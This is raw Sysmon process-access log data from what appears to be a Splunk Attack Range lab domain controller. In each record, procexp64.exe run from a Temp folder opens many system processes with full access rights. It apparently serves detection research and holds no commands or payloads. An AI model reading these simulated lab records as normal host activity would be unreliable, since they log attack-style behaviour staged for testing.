15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784833Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784832Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784831Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784830Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784829Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784828Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784827Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784826Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784825Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784824Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784823Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784822Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784821Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784820Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784819Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784818Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784817Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784816Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784815Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784814Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784813Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784812Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784811Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784810Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784809Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784808Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784807Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784806Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784805Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784804Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784803Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784802Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784801Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784800Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784799Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784798Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784797Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 